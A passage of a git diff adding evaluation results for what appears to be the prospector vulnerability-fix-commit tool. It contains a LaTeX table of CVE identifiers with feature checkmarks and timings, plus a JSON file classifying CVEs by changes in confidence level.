\checkmark & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & 1.61 & 0.17\\ \midrule +CVE-2019-10781 & & & & \checkmark & & & & & & & & & \checkmark & & \checkmark & & & 1.47 & 0.07\\ \midrule +CVE-2019-10787 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & 1.39 & 0.02\\ \midrule +CVE-2019-10792 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & 1.65 & 0.13\\ \midrule +CVE-2019-10793 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & & & & & 1.52 & 0.07\\ \midrule +CVE-2019-10795 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 1.5 & 0.04\\ \midrule +CVE-2019-10797 & & & & & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & & 26.93 & 25.42\\ \midrule +CVE-2019-10799 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & & & & 1.56 & 0.04\\ \midrule +CVE-2019-10867 & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 2.07 & 0.17\\ \midrule +CVE-2019-11272 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 3.08 & 0.17\\ \midrule +CVE-2019-11358 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & \checkmark & & \checkmark & & & 25.26 & 0.3\\ \midrule +CVE-2019-11512 & \checkmark & & & & \checkmark & & & & \checkmark & & \checkmark & & & & & & & 1.76 & 0.19\\ \midrule +CVE-2019-11514 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 3.75 & 1.36\\ \midrule +CVE-2019-11767 & & & & & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 4.03 & 0.74\\ \midrule +CVE-2019-11768 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 11.04 & 1.83\\ \midrule +CVE-2019-11777 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & \checkmark & & & & \checkmark & & & 4.67 & 0.16\\ \midrule +CVE-2019-12277 & & & & \checkmark & \checkmark & & & & \checkmark & & & \checkmark & & & & & & 1.67 & 0.19\\ \midrule +CVE-2019-12402 & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & & 15.68 & 0.17\\ \midrule +CVE-2019-12404 & & & & & \checkmark & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & 8.68 & 6.73\\ \midrule +CVE-2019-12407 & & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 9.24 & 7.09\\ \midrule +CVE-2019-12616 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 5.83 & 0.19\\ \midrule +CVE-2019-12741 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & 3.16 & 0.18\\ \midrule +CVE-2019-12814 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & & & \checkmark & & & 21.34 & 0.16\\ \midrule +CVE-2019-13127 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 1.78 & 0.03\\ \midrule +CVE-2019-13135 & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 4.06 & 0.17\\ \midrule +CVE-2019-13173 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 3.35 & 0.04\\ \midrule +CVE-2019-13295 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 5.6 & 0.16\\ \midrule +CVE-2019-13574 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 3.54 & 0.2\\ \midrule +CVE-2019-13644 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & & & & & \checkmark & & & 3.56 & 0.19\\ \midrule +CVE-2019-14537 & & & & & & & & & & & \checkmark & & & & & & & 23.13 & 19.0\\ \midrule +CVE-2019-14540 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & & 14.47 & 0.16\\ \midrule +CVE-2019-14668 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & & & & & \checkmark & & & 3.09 & 0.18\\ \midrule +CVE-2019-14669 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & & & & & \checkmark & & & 3.37 & 0.4\\ \midrule +CVE-2019-14671 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & \checkmark & & & & & \checkmark & & & 3.62 & 0.45\\ \midrule +CVE-2019-14672 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & & & & & \checkmark & & & 3.76 & 0.28\\ \midrule +CVE-2019-14751 & \checkmark & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 6.99 & 0.16\\ \midrule +CVE-2019-14806 & & & & \checkmark & & & & & & & \checkmark & & & & & & & 4.35 & 0.16\\ \midrule +CVE-2019-14837 & & & & \checkmark & & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 6.85 & 0.16\\ \midrule +CVE-2019-14862 & & & \checkmark & \checkmark & & & & & & & \checkmark & & \checkmark & & \checkmark & & & 5.59 & 0.13\\ \midrule +CVE-2019-14863 & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & \checkmark & & & 5.47 & 0.16\\ \midrule +CVE-2019-14893 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & & 5.18 & 0.16\\ \midrule +CVE-2019-14980 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & & & \checkmark & 5.53 & 0.16\\ \midrule +CVE-2019-15481 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 3.17 & 0.19\\ \midrule +CVE-2019-15532 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & 3.2 & 0.16\\ \midrule +CVE-2019-15657 & & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 2.85 & 0.16\\ \midrule +CVE-2019-15658 & & & \checkmark & & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & \checkmark & & & 1.58 & 0.17\\ \midrule +CVE-2019-16197 & & & & & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 5.57 & 0.17\\ \midrule +CVE-2019-16317 & & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & & & & & & & 2.04 & 0.28\\ \midrule +CVE-2019-16318 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 2.22 & 0.33\\ \midrule +CVE-2019-16335 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & & 5.46 & 0.17\\ \midrule +CVE-2019-16676 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & & & & & 2.01 & 0.16\\ \midrule +CVE-2019-16761 & & & & \checkmark & & & & \checkmark & & \checkmark & \checkmark & & & & & & & 2.0 & 0.17\\ \midrule +CVE-2019-16762 & & & & \checkmark & & & & \checkmark & & \checkmark & & & & & & & & 1.83 & 0.09\\ \midrule +CVE-2019-16763 & & & & \checkmark & \checkmark & & & & \checkmark & & & \checkmark & & & & & & 2.08 & 0.27\\ \midrule +CVE-2019-16766 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 2.26 & 0.31\\ \midrule +CVE-2019-16769 & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & & & & & & & & 3.22 & 0.08\\ \midrule +CVE-2019-16771 & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & & 2.54 & 0.2\\ \midrule +CVE-2019-16778 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 10.48 & 0.92\\ \midrule +CVE-2019-16779 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 3.87 & 0.1\\ \midrule +CVE-2019-16784 & \checkmark & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & \checkmark & & & & & & 2.42 & 0.4\\ \midrule +CVE-2019-16785 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 3.26 & 0.17\\ \midrule +CVE-2019-16786 & & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & & & & & & & 4.76 & 0.42\\ \midrule +CVE-2019-16789 & & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & & & & & & & 5.15 & 0.4\\ \midrule +CVE-2019-16792 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 2.62 & 0.44\\ \midrule +CVE-2019-17267 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & \checkmark & & & 6.64 & 0.17\\ \midrule +CVE-2019-17496 & & & & \checkmark & & & & & \checkmark & & & \checkmark & & & & & & 4.09 & 0.23\\ \midrule +CVE-2019-17513 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 2.65 & 0.16\\ \midrule +CVE-2019-17531 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & & 6.44 & 0.17\\ \midrule +CVE-2019-17541 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 7.24 & 0.86\\ \midrule +CVE-2019-17592 & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & 7.91 & 0.52\\ \midrule +CVE-2019-18622 & \checkmark & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 15.17 & 0.2\\ \midrule +CVE-2019-18656 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 2.13 & 0.18\\ \midrule +CVE-2019-18848 & \checkmark & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & & & & & & & 2.86 & 0.26\\ \midrule +CVE-2019-18857 & & & & \checkmark & \checkmark & & & & & & & & & & & & & 2.39 & 0.17\\ \midrule +CVE-2019-18874 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & & \checkmark & & \checkmark & & & 10.0 & 0.17\\ \midrule +CVE-2019-18889 & & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 3.29 & 0.17\\ \midrule +CVE-2019-18978 & & & & \checkmark & \checkmark & & \checkmark & & & & \checkmark & & & & & & & 3.48 & 0.19\\ \midrule +CVE-2019-18981 & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & & 2.02 & 0.16\\ \midrule +CVE-2019-18982 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 2.37 & 0.17\\ \midrule +CVE-2019-18985 & & & & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 2.61 & 0.28\\ \midrule +CVE-2019-18986 & & & & \checkmark & \checkmark & & & & \checkmark & \checkmark & \checkmark & & & & & & & 2.68 & 0.29\\ \midrule +CVE-2019-19010 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 5.31 & 0.16\\ \midrule +CVE-2019-19212 & & & & & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & & & & & 6.21 & 0.16\\ \midrule +CVE-2019-19275 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & \checkmark & & & 3.22 & 0.32\\ \midrule +CVE-2019-19507 & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & & & & & \checkmark & & & 2.16 & 0.09\\ \midrule +CVE-2019-19576 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & & & & 3.45 & 0.17\\ \midrule +CVE-2019-19619 & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 5.8 & 0.74\\ \midrule +CVE-2019-19703 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 2.37 & 0.17\\ \midrule +CVE-2019-19794 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & & \checkmark & & \checkmark & & & 6.69 & 0.17\\ \midrule +CVE-2019-20330 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & & 18.46 & 0.16\\ \midrule +CVE-2019-1000005 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & & \checkmark & & & 2.45 & 0.13\\ \midrule +CVE-2019-1000021 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 4.19 & 0.13\\ \midrule +CVE-2019-1010266 & & & & & \checkmark & & & & & & \checkmark & & & & & & & 26.56 & 23.32\\ \midrule +CVE-2019-1020012 & & & & \checkmark & \checkmark & & & \checkmark & & & & & & & & & & 2.47 & 0.18\\ \midrule +CVE-2020-1928 & & \checkmark & \checkmark & & \checkmark & & & & & & & & & & \checkmark & \checkmark & & 4.35 & 0.18\\ \midrule +CVE-2020-5219 & \checkmark & & & \checkmark & & & & \checkmark & & & & & & & & & & 2.04 & 0.11\\ \midrule +CVE-2020-5224 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & \checkmark & & & & & & & 2.14 & 0.24\\ \midrule +CVE-2020-5227 & & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & & & & & & & 2.91 & 0.18\\ \midrule +CVE-2020-5229 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 2.47 & 0.17\\ \midrule +CVE-2020-5232 & & & & \checkmark & & & & & & & & & & & & & & 1.8 & 0.1\\ \midrule +CVE-2020-5236 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 2.34 & 0.16\\ \midrule +CVE-2020-5249 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & \checkmark & 4.25 & 0.23\\ \midrule +CVE-2020-5390 & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & & & & & 3.46 & 0.16\\ \midrule +CVE-2020-5529 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 3.45 & 0.16\\ \midrule +CVE-2020-6836 & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 1.7 & 0.1\\ \midrule +CVE-2020-7597 & & & & \checkmark & \checkmark & & & \checkmark & & & & & & & \checkmark & & & 1.55 & 0.16\\ \midrule +CVE-2020-7981 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & \checkmark & & & & & & 2.36 & 0.16\\ \midrule +CVE-2020-8125 & & & & & \checkmark & & & & & & & & & & \checkmark & & & 1.63 & 0.15\\ \midrule +CVE-2020-8131 & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & \checkmark & & & & \checkmark & & & 4.31 & 0.16\\ \midrule +CVE-2020-9281 & & & & & & & \checkmark & \checkmark & & \checkmark & & & & & & & & 23.27 & 15.7\\ \midrule +CVE-2020-9283 & \checkmark & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 13.04 & 0.16\\ \midrule +CVE-2020-10236 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 12.0 & 0.27\\ \midrule +CVE-2020-10591 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 3.25 & 0.16\\ \midrule +CVE-2020-10672 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & \checkmark & & & 10.99 & 0.41\\ \midrule +CVE-2020-10673 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & \checkmark & & & 10.25 & 0.16\\ \midrule +\bottomrule +\end{longtabu} \ No newline at end of file diff --git a/prospector/evaluation/data/results/summary_execution_flow-analysis.json b/prospector/evaluation/data/results/summary_execution_flow-analysis.json new file mode 100644 index 000000000..21e0d5f6f --- /dev/null +++ b/prospector/evaluation/data/results/summary_execution_flow-analysis.json @@ -0,0 +1,2007 @@ +{ + "transitions": [ + { + "medium to high": [ + { + "CVE-2019-11767": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-10558": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2011-3923": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-10797": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-9970": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2020-8125": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-7674": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10780": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-10575": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-2525": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-10778": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-4977": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-10529": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-12616": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-13209": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-1263": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-10240": { + "different first commit": false, + "different references": true + } + }, + { + "CVE-2017-9796": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-8331": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-5641": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2011-1950": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-9844": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2018-14637": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10750": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-10694": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-10735": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2012-2378": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2018-3731": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-10611": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-1000013": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10760": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2015-6524": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-9212": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-11467": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-10528": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-5858": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2013-4111": { + "different first commit": false, + "different references": true + } + }, + { + "CVE-2015-1772": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-10559": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-18889": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2013-2172": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-10745": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2014-3576": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-10591": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-2617": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-3714": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2018-1260": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2018-1000014": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-4000": { + "different first commit": false, + "different references": true + } + }, + { + "CVE-2016-8738": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-16490": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-10764": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-16007": { + "different first commit": false, + "different references": true + } + }, + { + "CVE-2019-1010266": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10904": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2012-5812": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-4973": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10748": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-1000389": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-12407": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-8862": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-12620": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-16197": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-2667": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-12404": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-10560": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2013-4316": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-16459": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-15657": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2012-3536": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-19212": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-7617": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-1261": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-3250": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-17197": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + } + ] + }, + { + "low to high": [ + { + "CVE-2013-1607": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-7809": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-3577": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-2652": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-16462": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + } + ] + }, + { + "not_reported to false_positive": [ + { + "CVE-2016-3959": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-6652": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-4465": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-10354": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-0953": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-19316": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2012-1986": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-1000282": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-1304": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-9155": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-0762": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-4972": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-3630": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-9214": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2012-1054": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2012-1099": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10770": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-6793": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-14642": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2013-4152": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-11758": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2013-4428": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-8629": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-19919": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-3894": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-3709": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-17554": { + "different first commit": false, + 